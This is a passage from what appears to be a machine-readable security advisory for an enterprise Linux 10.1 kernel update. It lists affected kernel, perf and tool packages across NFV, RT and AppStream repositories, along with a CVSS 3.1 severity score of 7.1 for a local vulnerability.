"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
